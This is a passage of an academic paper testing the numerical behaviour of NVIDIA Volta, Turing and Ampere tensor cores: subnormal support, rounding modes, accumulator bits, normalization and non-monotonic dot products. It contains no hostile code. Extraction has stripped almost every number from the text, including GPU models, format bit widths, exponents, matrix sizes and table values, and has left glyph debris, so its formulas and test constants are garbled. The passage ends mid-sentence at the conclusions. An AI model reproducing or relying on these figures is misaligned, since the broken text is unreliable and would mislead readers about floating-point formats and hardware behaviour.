multiply-accumulate operation. here, in particular, we focus on the tensor cores available on the nvidia v (volta microarchitecture), t (turing architecture), and a (ampere architecture) gpus, which implement the operation how to cite this article fasi m, higham nj, mikaitis m, pranesh s. . numerical behavior of nvidia tensor cores. peerj comput. sci. :e doi . /peerj-cs. submitted july accepted november published february corresponding author mantas mikaitis, mantas.mikaitis@manchester.ac.uk academic editor arun somani additional information and declarations can be found on page doi . /peerj-cs. copyright fasi et al. distributed under creative commons cc-by . https://www.top .org/lists/top / / / http://dx.doi.org/ . /peerj-cs. mailto:mantas.�mikaitis@�manchester.�ac.�uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ d ¼ c þ a � b; � � � � � � � � � � � � � � � � |fflfflfflfflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflfflfflfflffl} binary or binary ¼ � � � � � � � � � � � � � � � � |fflfflfflfflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflfflfflfflffl} binary or binary þ � � � � � � � � � � � � � � � � |fflfflfflfflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflfflfflfflffl} binary � � � � � � � � � � � � � � � � � |fflfflfflfflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflfflfflfflffl} binary ( ) where a, b, c, and d are × matrices and “binaryxy” denotes the xy-bit format from the ieee standard for floating-point arithmetic (ieee, ). the entries of a and b must be in binary format, whereas those of c and d can be either binary or binary floating-point numbers depending on the accumulation mode. the newer a (ampere microarchitecture) gpus support a wider range of matrix dimensions, as well as an additional floating-point format, as shown in table . the element dij in ( ) can be seen as the sum of cij and the dot product between the ith row of a and the jth column of b, so that, for instance d ¼ a b þ a b þ a b þ a b þ c : ( ) unfortunately, nvidia provides very little information about the numerical features of these units, and many questions naturally arise. the white paper that describes the volta microarchitecture (nvidia, , p. ) states that tensor cores operate on fp input data with fp accumulation. the fp multiply results in a full precision product that is then accumulated using fp addition with the other intermediate products for a × × matrix multiply. the official documentation (nvidia, a) adds only a few more details: element-wise multiplication of matrix a and b is performed with at least single precision. when .ctype or .dtype is .f , accumulation of the intermediate values is performed with at least single precision. when both .ctype and .dtype are specified as .f , the accumulation table processing units or architectures equipped with mixed-precision matrix multiply- accumulate accelerators. the notation m × k × n refers to the matrix multiply-accumulate operation in ( ) where c and d are m × n matrices, and a and b have size m × k and k × n, respectively. year of release device matrix dimensions input format output format references google tpu v × × bfloat binary google ( ) google tpu v × × bfloat binary google ( ) nvidia v × × binary binary nvidia ( ) nvidia t × × binary binary nvidia ( ) arm v . -a × × bfloat binary arm ltd ( ) nvidia a × × bfloat binary nvidia ( b) × × binary binary × × tensorfloat- binary × × binary binary the binary and binary formats are sometimes referred to as fp (or fp ) and fp (or fp ), respectively. fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ is performed with at least half precision. the accumulation order, rounding and handling of subnormal inputs is unspecified. from a numerical point of view, many essential aspects of tensor cores are not specified. this lack of key information makes it challenging to simulate tensor cores on conventional ieee -compliant systems and to build hardware that can reproduce their behavior. moreover, it can lead to unexpected differences between the results computed on nvidia devices with tensor cores enabled or disabled. we now briefly recall some key aspects of ieee-compliant floating-point systems and the definitions and main properties of normalization and subnormal numbers, which are two important concepts in this work. a binary floating-point number x has the form (− )s × m × e − p, where s is the sign bit, p is the precision, m ∈ [ , p − ] is the integer significand, and e ∈ [emin, emax], with emin = − emax, is the integer exponent. in order for x to have a unique representation, the number system is normalized so that the most significant bit of m—the implicit bit in ieee parlance—is always set to if |x| ≥ emin. therefore, all floating-point numbers with m ≥ p − are normalized. numbers below the smallest normalized number emin in absolute value are called subnormal numbers, and are such that e = emin and < m < p − . subnormal numbers provide a means to represent values in the subnormal range, that is, between and the minimum normalized number. they have lower precision than normalized values (from p − bits to as low as bit), and require special treatment to be implemented in software and hardware. therefore it is not uncommon for hardware manufacturers not to support them, in order to avoid performance or chip area overheads. in implementing floating-point operations the result of an operation must be normalized (if possible) by shifting the significand left or right until it falls within the interval [ p − , p − ] and adjusting the exponent accordingly. more details can be found in muller et al. ( , sec. . ). the ieee standard for floating-point arithmetic provides a somewhat relaxed set of requirements for reduction operations such as dot product and multi-operand addition (ieee, , sec. . ): the order in which the partial sums should be evaluated is not prescribed, and the use of a higher-precision internal format is allowed. in particular, the standard does not specify: ( ) whether this internal format should be normalized, as it would be if the multi-operand addition were implemented using ieee elementary arithmetic operations, ( ) which rounding mode should be used, and ( ) when the rounding should happen. these loose requirements can potentially cause the results computed with a given multi-operand addition unit to be significantly different from those obtained using other hardware implementations or a software implementation based on ieee -compliant elementary arithmetic operations. with matrix multiplication being ubiquitous in artificial intelligence, accelerators for mixed-precision matrix multiply-accumulate operations are becoming widely available, as table shows. hardware vendors often design these units focusing on performance rather than numerical reliability, and this may lead to the implementation of unconventional, non-ieee-compliant arithmetics. some of the hardware units in table , for instance, use bfloat , a -bit format that allocates bits to the significand (including the implicit bit) fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and bits to the exponent and does not support subnormal numbers (intel corporation, ; intel corporation, ). it is worth noting that volta is the first nvidia microarchitecture supporting tensor cores—the older pascal gpus, such as the p , which are not reported in table , supported binary arithmetic but did not include tensor cores. the nvidia ampere a gpus introduce a new -bit format called tensorfloat- , which was designed to have the same dynamic range as binary ( bits) and the same precision as binary ( fraction bits, including the implicit bit) (nvidia, b). in order to better understand the differences between the results computed using different systems, it is necessary to develop techniques to probe the numerical features of these units. the situation is reminiscent of that before the widespread adoption of the ieee - standard, when different floating-point arithmetics had different properties. to address the issue, kahan ( ) developed a program called paranoia that analyzes and diagnoses a floating-point arithmetic, which was subsequently translated into c by karpinski ( ). we follow a similar route: using idiosyncrasies of floating-point arithmetic, we design tests to better understand the numerical behavior of tensor cores, extending the testing approach recently introduced by hickmann & bradford ( ). our aim is to explore the following questions. � are subnormal inputs supported or are they flushed to zero? can tensor cores produce subnormal numbers? � are the multiplications in ( ) exact and the additions performed in binary arithmetic, resulting in four rounding errors for each element of d? in what order are the four additions in ( ) performed? � what rounding mode is used in ( )? � is the result of each floating-point operation in ( ) normalized, or do tensor cores only normalize the final sum? what rounding mode is used for the normalization? the answers to these questions are of wide interest because these accelerators, despite being introduced to accelerate the training of deep neural networks (nvidia, , p. ), are increasingly being used in general-purpose scientific computing, where their fast low precision arithmetic can be exploited in mixed-precision algorithms (abdelfattah et al., ), for example in iterative refinement for linear systems (haidar et al., a, b, ). the results discussed here were produced by running our test suite, which is freely available on github (https://github.com/mfasi/tensor-cores-numerical-behavior). the file tc_test_numerics.cu can be compiled following the instructions in the readme.md file, so as to produce an executable that will run all the tests we describe in the following sections and produce a report. we run the test suite on an nvidia tesla v sxm gb gpu (volta microarchitecture), an nvidia tesla t gb gpu (turing microarchitecture), and an nvidia ampere a -pcia gb gpu. we used version . of the cuda library on the machines equipped with the volta and turing cards, and version . on the machines equipped with the a gpu, as gpus based on the ampere microarchitecture require at least version of the cuda library in order to utilize the fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/mfasi/tensor-cores-numerical-behavior http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ latest numerical features such as the tensorfloat- numerical type. some graphic cards designed for intensive graphic processing workloads such as video gaming, computer- aided design, or computer-generated imagery, also include tensor cores: all the gpus in the geforce and quadro rtx series are based on the turing microarchitecture, and those in the recently announced geforce series are based on the ampere microarchitecture. we do not consider this wealth of different graphic cards here, as our focus is on the nvidia hardware that is present in the supercomputers in the top list and targets scientific computing applications. we stress, however, that the ideas we employ are very general and can be exploited to understand the numerical features of any hardware accelerator based on operations of the form ( ). finally, we remark that the binary arithmetic implemented in the nvidia cuda cores is not fully ieee compliant, as round-to-nearest is the only rounding mode implemented for elementary arithmetic operations (nvidia, c)—we use this observation in “support for subnormal numbers”. previous work from a hardware perspective, instruction-level details, register configuration, and memory layout of the tensor cores in the nvidia volta (jia et al., b; yan, wang & chu, ) and turing (yan, wang & chu, ; jia et al., a) gpus have been extensively described. another study by basso, dos santos & rech ( ) explores the reliability of tensor cores in terms of rate of hardware errors in matrix multiplications. the main finding is that low-precision operations and usage of tensor cores increase the amount of correct data produced by the gpu, despite increasing the impact of numerical errors due to the use of lower-precision data. in order to quantify the accuracy of tensor cores, blanchard et al. ( ) provide a rounding error analysis of what they call a block fused multiply-add (fma), a generalization of the multiply-accumulate operation in ( ) in which the matrix sizes, the precisions of the arguments, and the internal precision of the accumulator are taken as parameters. markidis et al. ( ) discuss various aspects of tensor cores and propose a technique, called precision refinement, to enhance the accuracy of mixed-precision matrix multiplication. improving the accuracy of tensor-core-based matrix multiplications was further explored by mukunoki et al. ( ). none of the these sources, however, examines to what extent tensor cores conform to the ieee standard or investigates how tensor cores compare with a matrix multiply-accumulate operation based on dot products implemented in software. hickmann & bradford ( ) explore some details of the numerical behavior of tensor cores with the main goal of inferring the hardware-level design of these units. our work follows a similar approach and complements their findings by supplying further insights into the subject. we show that the additions in ( ) are performed starting from the operand that is largest in magnitude, that at least extra bits are used for carries, and that ( ) may be non-monotonic for certain sets of inputs. furthermore, we consider the second and third generation of the tensor cores, which equip the turing t and ampere a gpus, respectively, and conclude that their internal accumulator has an extra bottom bit fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ compared with the tensor cores on v gpus. finally we make our test suite freely available, in order to guarantee reproducibility and facilitate testing other matrix multiply- accumulate units, such as the third generation tensor cores in the latest nvidia a gpus (nvidia, b). results in this section we describe our testing methodology and give the results obtained on the three nvidia graphics cards we considered. table summarizes the tests we performed and indicates the subsections in which they are described. our methodology is to find test cases that demonstrate specific numerical behaviors and, by making the (quite reasonable) assumption that the hardware has a consistent behavior across the input space, conclude that the discovered features should be true for all possible inputs. nvidia volta tensor cores tensor cores can be accessed using the cublas library, or the native hardware assembly instructions hmma. (jia et al., a, b) and hmma. (yan, wang & chu, ; jia et al., a). in our experiments, we opted for the warp-level c++ function wmma::mma_sync(), which performs a × × matrix multiply-accumulate operation. this is the lowest level interface to access the tensor cores in the nvidia cuda programing environment. in order to use only a single tensor core, we set all but the top left × blocks to . we ensure that our experiments do use the tensor cores by running our test suite with the nvidia profiler nvprof, which shows the utilization levels of different hardware components on the gpu, and by observing that the assembly code produced by the nvcc compiler contains hmma instructions. at the software level, tensor cores can be used in either binary or binary mode, which defines the number format of d in ( ). table summary of the subsections of “results”. section devices used and description of tests performed on them nvidia volta tensor cores tests performed on the nvidia v (volta) gpu support for subnormal numbers support for subnormal numbers (on the inputs, outputs and the computation of subnormals from the normalized inputs) accuracy of the dot products accuracy of the inner products performed as part of matrix multiply-accumulate (accuracy of scalar multiplies, accuracy of addition, and number of rounding errors introduced) rounding modes in tensor core computations tests for determining what rounding modes are used in the inner products and the final rounding features of the accumulator tests that explore the number of extra bits in the alignment step of floating-point addition inside the inner product (extra bits at the bottom of the internal significand) a test to find out whether the normalization is performed only at the end or after each addition in the computation of the inner products a similar test for the normalization in subtraction tests for determining the number of extra bits for carries in floating-point addition (extra bits at the top of the internal significand) a test to check the monotonicity of the inner products nvidia turing tensor cores all tests from “nvidia volta tensor cores” rerun on the nvidia t (turing) gpu nvidia ampere tensor cores all tests from “nvidia volta tensor cores” rerun on the nvidia a (ampere) gpu fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the experiments in this section were run on an nvidia tesla v sxm gb (volta microarchitecture) gpu. support for subnormal numbers we start by investigating the support for subnormal numbers, as this knowledge will dictate what range of input values we are allowed to use in subsequent tests. table compares precision, exponent range, machine epsilon, and magnitude of smallest representable subnormal and normal number for various floating-point number formats, including those supported by the three generations of tensor cores. by looking at the data in the table, we can make two important observations. first, conversion from binary to binary does not result in subnormal numbers. second, the product of two binary numbers requires at most bits for the significand, bits for the exponent and one for the sign, and thus can be represented exactly in binary . as for tensor cores, there are multiple questions regarding the support of subnormal numbers. . can tensor cores take binary subnormal numbers as inputs for a and b in ( ) without flushing them to zero, use them in computation, and return binary or binary normal or subnormal results? . can tensor cores take binary subnormal numbers as inputs for c in ( ) without flushing them to zero, use them in computation, and return subnormal binary results? . can tensor cores compute subnormal numbers from normal numbers and return them? the first question can easily be addressed by considering ( ) and setting a = − , b = (arbitrarily chosen), and the remaining elements to zero. the tensor cores return the subnormal result a b = − in both binary and binary mode, thereby answering the first question in the affirmative. an analogous idea can be used to clarify the second point: setting c to the smallest positive binary subnormal − and all the elements of a and b to zero yields d = − , which confirms that the subnormal number c is not altered by the dot product in ( ). we note, however, that whether support for binary subnormals is needed is questionable. the absolute value of the smallest nonzero value that can be produced from the multiplication of two binary numbers is − , thus c would not contribute to table parameters of various floating-point formats: number of digits of precision including the implicit bit (p), boundary of the exponent range (emin and emax), machine epsilon (ε), and smallest positive representable normal (fmin) and subnormal (smin) numbers. the formats from the ieee standard (ieee, ) are binary , binary , and binary . binary bfloat tensorfloat- binary binary p emax , emin − − − − − , ɛ − − − − − fmin − − − − − smin − − − − − fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the sum if it were a binary subnormal: in binary arithmetic with round-to-nearest, one has that − + x > − only if x > − · − = − , which is normal in binary . for the third question, we can obtain subnormal numbers as outputs in several ways. for instance, we can set a to − , the smallest normal number in binary , and b to − , and confirm that tensor cores return the binary subnormal − in both binary and binary modes. another possibility is to set a = − , b = , and c = − − , which produces the subnormal binary number d = − . as mentioned above, it is not possible to obtain subnormal binary numbers from binary inputs in ( ). in summary, these experiments demonstrate that there is full support for subnormal inputs in tensor cores. one might wonder whether tensor cores natively support subnormals or some degree of software interaction is present. the nvidia profiler confirms that the experiments discussed in this section make use of the tensor cores, but we implemented an additional test to further reinforce the evidence that subnormals are supported in hardware. in “rounding modes in tensor core computations” we show that tensor cores use round-towards-zero. we can use the fact that cuda cores provide only round-to-nearest for binary computations to show that subnormals are in fact manipulated with tensor cores. in order to do so, we set a and a to , b to the binary subnormal − + − , b to and the other elements of a and b to . since the addition in ( ) is done in binary arithmetic, the smallest value that can be exactly added to b = is − . in this case, b ¼ � þ � ¼ � � will either be round down to , if round-towards-zero is being used, or rounded up to − , if the summation is carried out using the cuda cores, which support only round-to-nearest. this computation returned the value , meaning that b was rounded down—a further indication that subnormals are natively supported by tensor cores. accuracy of the dot products our second goal is to test the accuracy of the dot product ( ) with the tensor cores. the first step is to check that the products of two binary values are computed exactly, which implies that the products must be kept in some wider intermediate format and accumulated without being rounded back to binary . specifically we want to test that a ibi , for i = ,…, , is computed exactly. this can be achieved by ensuring that the four multiplications produce floating-point numbers that are not representable in binary and checking that these are preserved and returned as binary entries of d. in order to demonstrate this, we set the first row of a and the first column of b to − − and c to . the exact value of each partial product is ( − − ) · ( − − ) = − − + − , which, depending on the rounding mode, would be rounded to either − − or − − , if the products were stored in binary . as tensor cores produce the exact binary answer d = · ( − − + − ), we conclude that partial products are held exactly. another question is whether the precision of the -operand addition in ( ) changes in any way when binary is used to store the elements of the matrices c and d in ( ). the test is to set a = b = a = − − , b = − , and the remaining elements to . in this test, the first product a b = − − + − requires precision higher than binary to be represented, whereas the second evaluates to a b = − − − . the sum fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of these two products is a b + a b = − − + − , which is representable in binary but would not be computed exactly by a binary accumulator, since storing the first product requires higher precision. indeed we found that tensor cores output the exact value, confirming that the partial products are still held exactly even when c and d are in binary format. a third question concerns the number of rounding errors in the -operand adder that accumulates the partial products. the dot product in ( ) contains four additions, three to sum up the exact partial products and a fourth to add the binary argument c . our expectation is that the additions are done in binary rather than exactly, as indicated by nvidia ( , a). in order to confirm this, we can set the first row of a to , thereby reducing ( ) to d ¼ b þ b þ b þ b þ c ; ( ) and then run different cases with one of the addends in ( ) set to and the rest set to − . in this test, an exact addition would return + − , whereas inexact binary arithmetic would cause round-off errors when adding − to , causing the number to be returned. all permutations return d = , leading to the following conclusions. � in the worst case each element of d includes four rounding errors, which conforms to the block fma model used by blanchard et al. ( , sec. . ). � the partial products in ( ) are not accumulated in a fixed order, but always starting from the largest value in magnitude. this sorting is necessary in order to know which arguments require to be shifted right in the significand alignment step of a standard floating-point addition algorithm (muller et al., , sec. . ), (tenca, ), and is most likely done in hardware. this is in line with the literature on hardware dot products (kim & kim, ; tao et al., ; sohn & swartzlander, ; kaul et al., ), where either sorting or a search for the maximum exponent is performed. furthermore, this experiment demonstrates that none of the additions are performed before aligning the significands relative to the largest exponent: if evaluated before the arguments are shifted right relative to the largest magnitude arguments’ exponent (by having multiple alignment stages), any other sum would evaluate to − + − = − , a value that then could be added exactly to the total sum as the least significand bits would not be lost in the alignment. in summary, each entry of d in ( ) can have up to four rounding errors, and the - operand additions that compute each element are performed starting from the largest summand in absolute value. rounding modes in tensor core computations if binary mode is used, only the four additions in ( ) can be subject to rounding errors. the ieee standard defines four rounding modes for elementary arithmetic operations (ieee, , sec. . ): round-to-nearest with even-on-ties, round-towards-zero, round-towards-minus-infinity, and round-towards-plus-infinity. in this section we use the fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ notation defined by muller et al. ( , sec. . . ) and denote these four rounding operators by rn, rz, rd, and ru, respectively. as round-to-nearest is the default rounding mode in the ieee standard, we start by testing whether this is the rounding mode used by the tensor cores. this can be verified by setting any two partial products to values such that one of them would be rounded up only if round-to-nearest or round-towards-plus-infinity were used. if the result is rounded down we can conclude that the tensor cores implement either round-towards-zero or round-towards-minus-infinity, but neither round-to-nearest nor round-towards-plus- infinity (fig. b). one such test is to set in ( ) b = , b = − + − , and the remaining entries in the first column of b to . note that in binary arithmetic rn( +x) > if x > · − = − , whereas the smallest positive y such that rz( +y) > is · − = − . the choice b ¼ � � is such that x < b < y, thus rn(b +b ) = ru(b +b ) = + − while rz(b +b ) = rd(b +b ) = . running this experiment on tensor cores returns c = , suggesting that either round-towards-zero or round-towards-minus-infinity is used for the additions in ( ). we can discriminate between these two rounding modes by repeating the same experiment on the negative semiaxis (fig. a), which can be achieved by changing the sign of the nonzero elements in b. this experiment produces c = − , and assuming that the rounding mode does not depend on the input, we conclude that the additions in ( ) are performed in round-towards-zero. we note that this rounding mode is known to be the cheapest option to implement (santoro, bewick & horowitz, , sec. . ) and is usually chosen for that reason. when tensor cores are used in binary mode, the result computed in the format of the internal accumulator of the -operand adder has to be rounded to binary before being returned. in order to test the rounding mode used by this operation, we set a = a = − , b = − , b = − , and the rest of elements of a and b as well as c to . the exact result of the dot product in this case is − + − , which is not representable in binary , and therefore will cause rounding errors in the result. note that � þ � ¼ � � , therefore figure demonstration of the possible ieee rounding modes for different positions of the exact value x; x and x are the two floating-point numbers closest to x, and xm is the half-way point between them. the dotted arrows surrounding x show the direction in which various rounding modes would round it. (a) negative axis, x on the left of the middle point; (b) positive axis, x on the right of the middle point; (c) negative axis, x on the right of the middle point; (d) positive axis, x on the left of the middle point. full-size doi: . /peerj-cs. /fig- fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rn( − + − ) = ru( − + − ) = − while rz( − + − ) = rd( − + − ) = . the fact that tensor cores return − confirms that round-towards-zero is not used, thereby suggesting that this conversion is performed in software rather than inside the tensor cores, which use round-towards-zero as we have determined above. figures c and d show how round-towards-minus-infinity and round-towards-plus- infinity could alternatively be determined by choosing x such that |x| < |xm|. features of the accumulator we now discuss some tests that allowed to determine various features of the internal accumulator of the -operand adder calculating ( ). the quotes from nvidia that we provided in “introduction” indicate that the internal accumulation is done in binary format; here we show that the internal format used by the accumulator has higher precision and that the partial sums are not normalized. extra bits in the alignment of significands in order to compute the sum of two floating-point values, the floating-point adder matches the exponents of the two summands by shifting the significand of the number that has the smaller exponent to the right. in general this operation causes loss of information, as the least significant bits of the shifted significand are typically discarded, but it is customary to retain a few of these digits to guard the computation against numerical cancelation and to obtain correct rounding in round-to-nearest, round-towards-plus-infinity, and round-towards-minus-infinity. as tensor cores use truncation in the additions, we know that they do not require any such guard digits for rounding, and we can easily show that in fact they do not implement guard digits at all. if in ( ) we set b = and c = − + − , the tensor cores return d = − , which represents a relative error of ( − − − )/ − = . normalization in addition when two floating-point values are added, the significand of the result may become larger than (with m > p − , where m is an integer significand as in our definitions in “introduction”), in which case a normalization step (shifting the significand right by one place and increasing the exponent by one) is required (muller et al., , sec. . ). in an ieee -compliant arithmetic, the result of each partial sum in ( ) would be normalized, as floating-point adders always normalize the result in order to produce a normalized floating-point number. but tensor cores compute the whole expression ( ) in hardware rather than by means of ieee elementary arithmetic operations, and it is natural to ask whether each partial result in ( ) is normalized or only the final answer is. we can verify this by adding values chosen so to produce different results with and without normalization of the partial sums. in ( ) we set c = − − and the elements of the first column of b to − . recalling that the values are accumulated on the summand of largest magnitude, we start by examining what would happen if each partial result were normalized. the exact value of the partial sum s = c + − is , and the normalization step would shift the significand by one bit to the right. at this point the three remaining addends would be smaller than the least significant bit of the partial sum, thus adding them to s separately fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ would have no effect with round-towards-zero. if the partial results were not normalized, on the other hand, the sum of c and − would be held with one extra bit, and the remaining addends could be added to it. running this test on tensor cores shows that only the final result of the dot product is normalized. this has probably been done in order to simplify the implementation; a similar choice was made for example in the hardware accelerator for performing vector inner product described by kim & kim ( ). normalization in subtraction as the products in ( ) can be positive as well as negative, some of the partial sums can in fact be subtractions. the significand of the difference of two floating-point numbers may be smaller than , in which case the result has to be normalized by shifting the significand left and decreasing the exponents accordingly until the result becomes a normal number. we can show that tensor cores do not perform this kind of normalization as follows. if in ( ) we set c = − + − , and two of the elements of the first column of b to and − − , we have that d evaluates to if the partial sums are normalized. instead, running this experiment on tensor cores yields d = − , which can be explained as follows. when the sum is evaluated as ( + c ) − − , then the lack of guard digit implies that + c evaluates to − , and if the partial results were normalized the tensor cores would return − − − , which can be represented exactly in binary format’s precision. if, on the other hand, the sum were evaluated as (− − + ) + c , the first sum would return due to the lack of guard digit, and the lack of normalization would not have any effect in this case. we can conclude that the result of the subtraction is not normalized, as long as we assume that the summands in ( ) are accumulated on the largest in magnitude in a fixed order. extra bits for carry out another question concerns the number of extra bits required due to lack of normalization. if only the final result is normalized, then accumulating k addends requires ⌈log k⌉ bits for the carry-out bits (ercegovac & lang, , sec. . ), and the hardware for accumulating the values in ( ) would internally require ⌈log ⌉ = extra carry-out bits at the top of the significand. we can prove that the internal accumulator of the -operand adder in tensor cores has at least two extra bits as follows. in ( ) we take c = + − + − , which sets the two least significant bits of the significand to , and assign to the first column of b a permutation of the values , , , and − . we consider all four possible permutations of these values in the first column of b, as we assume that the addends apart from the largest in magnitude are not sorted. the main idea is to show that if is added to c three times, then the last two bits of c are not dropped as they would be if the accumulation were performed using ieee floating-point arithmetic, as the significand of c + > would have to be shifted by two places to the right in order to be normalized. then, when − is added at the end, the carry propagates into the third bit from the bottom and therefore is not lost in the final normalization step. if there are extra bits, then all the four possible orderings of the first column of b will return the exact result + − . running these tests on tensor cores, we found that all four combinations returned the fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ exact result, thereby proving that the significand of the internal accumulator has at least extra bits for carries. this technique cannot be used to incontrovertibly show that the -operand adder has a third extra bit for carries. on the one hand, all inputs to the multi-operand adder must have the most significant bit of the fraction (the implicit bit) set to , in order to produce carry that requires all three extra bits, on the other, the result of one of the four products of the form a kbk in ( ) must have the least significant bit of the fraction set to . as the product of two binary numbers can have at most significant digits, no combination of input can produce a partial product with the required characteristics. it is possible, however, to show the presence of the third bit if we assume that the alignment of the significand is always performed so that the most significant bit of the largest summand in the -operand adder occupies the left-most position. since we know that there are two extra bits and no normalization, we can show that there is also a third bit by showing that there is no overflow when each of the four additions in ( ) causes carry out. we can set, for example, c = + − + − + − , b = , b = + − , b = + − + − , and b = + − + − + − and observe that the tensor core returns d = . if only two extra bits were present, on the other hand, overflow would occur and the adder would incorrectly return d = . in summary, we can conclude that the internal significand of the tensor cores is most likely bits wide in volta cards and bits wide in turing and ampere cards (see “nvidia turing tensor cores” and “nvidia ampere tensor cores”). it is worth noting at this point that if ( ) there is no normalization, ( ) the additions in ( ) start with the largest value in magnitude, and ( ) all of the significands of the addends are shifted right relative to the exponent of the largest value in magnitude, then the order in which the remaining addends are accumulated will not impact the final result. in the test case above, by replacing one of the − by we can also confirm, using the methods developed in “rounding modes in tensor core computations”, that the rounding mode in the final normalization step (internal accumulator conversion to binary answer) is round-towards-zero. monotonicity of dot product the observation in the previous section raises one final question regarding the monotonicity of the sums in ( ). the accumulation is monotonic if in floating-point arithmetic the sum x + ⋯ + xn is no larger than y + ⋯ + yn if xi ≤ yi for all ≤ i ≤ n. we can show that the lack of normalization causes the dot product in tensor cores—and most likely in any other similar architectures in which partial sums are not normalized (kim & kim, ; tao et al., ; sohn & swartzlander, ; kaul et al., )—to behave non-monotonically. let us consider ( ) and set all the elements in the first column of b to − and then c to − − and in turn. when c = − − , the difference in exponents guarantees that the values in b are large enough to be added to c . this causes the result to become larger than , requiring a normalization that returns − − + · − = + − . on the other hand, when c = , none of the summands in ( ) is large enough to be added to c , as the elements in the first column of b are all zeroed out fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ during the significand alignment step of each addition. this happens because the exponent of is larger than that of − − . in summary we have d ¼ c þ � þ � þ � þ � ¼ þ � when c ¼ � � ; d ¼ c þ � þ � þ � þ � ¼ when c ¼ : these two sets of inputs demonstrate that tensor cores can produce non-monotonic behavior. nvidia turing tensor cores nvidia turing t gpus are equipped with the second generation of tensor cores, which adds an integer matrix multiply-accumulate operation. it is not documented whether the binary /binary tensor core arithmetic in turing chips differs from that in volta cards, therefore it is of interest to run the test suite we designed on one of the turing cards. we ran all the above experiments on an nvidia tesla t gb (turing microarchitecture) gpu, and noticed that some of the results were different from those obtained on a v gpu. we found that this is due to the presence of an additional extra bit of precision at the bottom of the significand of the internal accumulator of the -operand adder. this has an impact over several of the tests above: the operation + − + − , for example, can now be performed exactly because of the presence of the extra bit. the results obtained on the v gpu can be replicated by means of a suitable change of the constants that are chosen depending on the number of extra bits in the accumulator. for instance, in the test for the order of operations in “accuracy of the dot products”, the constant − should be replaced by − , which is the value of the next bit to the right. using this approach, we found that all the conclusions we drew about the tensor cores in v gpus remain valid for the second version of tensor cores in the t gpus, with the only exception of the extra bit at the bottom of the internal storage of the -operand adder. if we denote the fixed-point format with i integer bits and f fraction bits by {i.f}, the significand of the internal format of the -operand adder of a v gpu has format { . } (or { . } if extra bits for carries are present as discussed in “features of the accumulator”), whereas that of a t gpu has format { . } (or { . }). the final normalization and rounding produce a number whose significand has format { . }, which is the format of the significand of a binary floating-point number. nvidia ampere tensor cores as shown in table , the ampere microarchitecture offers four different variants of tensor core operations (input/output format): binary /binary , bfloat /binary , tensorfloat- /binary , and binary /binary . in this section we summarize, for each of these four configurations, the results obtained by running our test suite on the a gpus. we refer to the -element dot product in ( ), even though some of the tensor core operations available on a gpus use input vectors of dimension two or eight, as can be seen in table . in our tests we only use the first few elements of each input vector, so ( ) is relevant even when dealing with operations that would require some of the input vectors to have eight elements, as we tacitly assume that all the remaining entries are set to . fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in binary /binary mode, we found no differences between the ampere and turing tensor cores, as all the tests in our suite produce the same results on the two gpus. therefore we moved to the other three modes, which are new as they were introduced with the nvidia ampere architecture. we started by adapting our test suite to the bfloat /binary mode. the main difference in this configuration is that the subnormals in bfloat are a subset of the subnormals in binary , whereas all binary subnormals were normalized values in binary . for this reason, in binary /binary mode, we could only observe that binary subnormals in the input are preserved in the output. in this mode, however, binary subnormal outputs may in principle be produced during the computation from normal inputs, and we can verify that this is indeed the case with the following experiment. if in ( ) we set a = − , b = − (normalized bfloat values), and the remaining coefficients to zero, the tensor cores correctly produce the subnormal binary result d = − . to summarize, this precision configuration presents the same numerical behavior as the binary /binary configuration in the t gpu tensor cores, and an additional test for subnormals confirmed full support for bfloat subnormal input and binary subnormal output. next we looked at the a with tensor cores configured in tensorfloat- /binary mode. tensorfloat- can represent more subnormal values than bfloat due to extra bits in the significand (table ), and this was taken into account in our tests. the rest of the test suite was run with the same input used for the binary /binary configuration, since the significands are of the same width, and produced the same results. our conclusion is that the tensorfloat- /binary mode exhibits the same features as the binary /binary configuration in the t gpu. the last configuration of the ampere tensor cores is binary /binary . we found that the numerical behavior of this mode differs significantly from that of the other three configurations that are available on these graphic cards. in the multi-operand addition in ( ), in particular, we observed that round-to-nearest with ties to even is used, and that the normalization is performed after each addition rather than only once at the end of the computation. as the result of each addition is normalized, no extra bits for carries are required, and the monotonicity issue discussed in “features of the accumulator” does not occur for this rounding mode. we also note that since accumulation is performed in binary , there would be no advantage in holding the binary products exactly. moreover, the additions in ( ) are not always performed starting from the largest addend, as was the case with the other modes. in summary, our results suggest that in binary / binary mode the ampere tensor cores have the same numerical features that a matrix multiply-accumulate operation implemented using ieee -compliant arithmetic operations would have. conclusions our 